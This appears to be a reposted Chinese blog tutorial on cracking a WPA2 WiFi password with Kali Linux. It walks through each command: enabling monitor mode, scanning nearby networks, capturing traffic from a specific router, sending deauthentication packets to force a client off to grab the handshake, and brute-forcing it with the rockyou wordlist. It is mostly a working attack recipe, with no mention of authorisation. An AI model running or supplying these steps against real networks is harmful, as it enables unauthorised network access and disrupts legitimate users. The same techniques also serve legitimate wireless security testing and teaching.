Kali Linux暴力破解WiFi

Kali Linux暴力破解WiFi
一. 前期准备

  1. 硬件
    外置网卡(型号EDUP EP-N8508GS)
    笔记本
    路由器(TP-Link)
  2. 软件
    虚拟机(VM Ware 15pro)
    操作系统(Kali Linux)
  3. 虚拟机网络适配器设置为桥接模式
  4. 外置网卡连接Kali Linux
    二. 激活无线网卡至monitor(监听)模式
  5. 配置无线网络接口
iwconfig

Kali Linux暴力破解WiFi_第1张图片
2. 关闭network manager网络服务

service network-manager stop
  1. check将所有影响到aircrack-ng工作的进程罗列出来,强烈推荐使用aircrack-ng套装的时候停掉这些进程。check kill会罗列并杀死影响aircrack-ng的进程
airmon-ng check kill

Kali Linux暴力破解WiFi_第2张图片
4. 开启monitor模式

airmon-ng start wlan0

Kali Linux暴力破解WiFi_第3张图片
MAC80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon
表示在监听模式下无线网卡名称变为wlan0mon
5. iwconfig确认是否进入monitor模式

iwconfig

Kali Linux暴力破解WiFi_第4张图片

三. 探测阶段

sudo airodump-ng wlan0mon

Kali Linux暴力破解WiFi_第5张图片
探测周围WiFi的各种信息

可以看到,最右侧的ESSID,下面的是周围WiFi的名字,BSSID是WiFi对应的mac地址。ENC是加密方式,可以看到基本都是WPA2的,很少有WPA和WEP,因为这两个的安全性都较WPA2次之。CH是信道。
在这里选择对加密类型为WPA2的TP-LINK_85EF进行抓包,可看到BSSID即mac地址为F4:83:CD:57:85:EF,CH即信道为1。
四. 抓包阶段

airodump-ng -c 1 --bssid F4:83:CD:57:85:EF -w leo wlan0mon

Kali Linux暴力破解WiFi_第6张图片

使用airodump-ng这个工具进行抓包:
-c 1是频道1
–bssid 是WiFi热点对应的mac地址
-w leo是保存到文件leo中
wlan0mon是监听模式无线网卡名称
五. 攻击阶段

  1. 解压Kali Linux中默认存在的字典
cd /usr/share/wordlists
gunzip rockyou.txt.gz
cd /root

在这里插入图片描述

这里顺便记录一下Kali中几个常用的字典文件的位置:

/usr/share/john/password.lst
/usr/share/wfuzz/wordlist
/usr/share/ wordlists
  1. 攻击
aireplay-ng -0 2 -a F4:83:CD:57:85:EF -c 80:ED:2C:79:C4:9D wlan0mon

在这里插入图片描述
-0 采用deauth攻击模式,后面跟上攻击次数,这里我设置为2
-a 后跟路由器(WiFi热点)的mac地址
-c 后跟客户端的mac地址
这里为了获得破解所需的WPA2握手验证的整个完整数据包,我们将会发送一种称之为“Deauth”的数据包来将已经连接至无线路由器的合法无线客户端强制断开,此时,客户端就会自动重新连接无线路由器,我们也就有机会捕获到包含WPA2握手验证的完整数据包了。
3. 重复抓包
Kali Linux暴力破解WiFi_第7张图片
可以看到右上角多了一个WPA handshake,如果没有,就再攻击一次,我这个就是攻击了两次才出现的。出现之后攻击阶段与抓包阶段就结束了。
六. 破解阶段

ls
aircrack-ng -w /usr/share/wordlists/rockyou.txt leo-04.cap

Kali Linux暴力破解WiFi_第8张图片
首先ls查看当前目录产生的握手包名称(leo-04.cap)
-w 代表字典
KEY FOUND! 代表WiFi密码已破解成功,后跟破解得到的密码。

你可能感兴趣的:(Kali Linux暴力破解WiFi)